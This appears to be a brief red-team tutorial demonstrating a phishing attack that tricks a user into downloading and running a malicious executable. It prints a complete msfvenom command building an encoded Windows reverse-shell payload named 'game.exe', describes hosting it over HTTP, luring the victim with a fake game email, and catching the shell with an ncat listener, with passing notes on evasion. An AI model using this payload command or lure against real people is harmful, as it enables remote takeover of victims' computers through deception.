The use of binaries has highly decreased but this is still a good example on how User's download EXE files and give access to attackers

This is an old form of attack not widely used as of time of writing but has been effective in previous time's.

I will demonstrate a simple chat email that will contain a link to download the executable that way it evades the Email providers security measures in scanning the binary. This will simple give the user a prompt to download or run the binary.

I will create a simply binary using msfvenom tool this is the following command I used, this tool is very well known in the industry so chances of detection are incredibly high. Obfuscation, packaging and other methods may be used for Evasion. This can also be considered an attachment

msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST= LPORT=1337 --encoder x64/xor --iterations 9 --format exe --out game.exe

We need to host our binary on a server we controlled so this can be properly delivered as this is a simple DEMO, I used python to host an HTTP server to send a link to the user which will immediately download to the machine.

As simple email asking the user to download this New Game so we can play online. The user views the Mail

Once clicking on the link there will be a prompt for the User to Run or Save for these purposes we will go directly and Run the EXE file.

File gets executed

And on our attacking machine we will setup a listener using ncat (this can be any personal choice there are many other available options.

Last updated